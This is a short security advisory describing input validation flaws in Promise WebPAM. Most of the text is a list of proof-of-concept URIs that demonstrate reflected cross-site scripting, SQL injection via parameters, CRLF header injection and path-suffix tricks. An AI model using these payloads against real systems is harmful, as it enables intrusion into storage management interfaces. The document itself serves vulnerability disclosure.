Promise WebPAM Multiple Input Validation Vulnerabilities

Promise WebPAM Multiple Input Validation Vulnerabilities

An attacker can exploit some of these issues with a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

https://www.example.com/promise/ent_i.jsp?startTime=<script>alert("ZSL");</script>
https://www.example.com/promise/ent_i.jsp?endTime=<script>alert("ZSL");</script>
https://www.example.com/promise/ent_i.jsp?entSortOrder=desc%27
https://www.example.com/promise/ent_i.jsp?entSort=time%27
https://www.example.com/promise/tools/sqlrun.jsp?sqlstr=[QUERY SQLi]
https://www.example.com/promise/usr_ent.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection
https://www.example.com/promise/usr_t.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection
https://www.example.com/promise/index.jsp%00
https://www.example.com/promise/index.jsp%20
https://www.example.com/promise/index.jsp%5C
https://www.example.com/promise/index.jsp#
https://www.example.com/promise/index.jsp\